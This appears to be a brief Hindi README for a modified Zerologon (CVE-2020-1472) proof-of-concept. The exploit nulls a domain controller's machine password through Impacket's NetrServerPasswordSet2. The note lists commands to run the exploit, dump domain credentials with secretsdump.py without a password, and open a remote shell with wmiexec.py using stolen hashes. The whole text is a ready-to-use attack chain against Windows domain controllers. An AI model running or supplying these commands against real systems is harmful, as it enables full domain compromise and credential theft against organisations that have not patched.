
Secura से परीक्षण PoC को संशोधित किया, CVE-2020-1472, मशीन पासवर्ड को null में बदलने के लिए।
परीक्षण PoC को Secura से संशोधित किया गया, CVE-2020-1472, मशीन के पासवर्ड को शून्य करने के लिए। मशीन पर पासवर्ड बदलने के लिए Microsoft के NetrServerPasswordSet2() फ़ंक्शन का उपयोग किया जाता है। यह शोषण Impacket के nrpc.py मॉड्यूल का लाभ उठाता है NetrServerPasswordSet2() को कॉल करने के लिए।
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
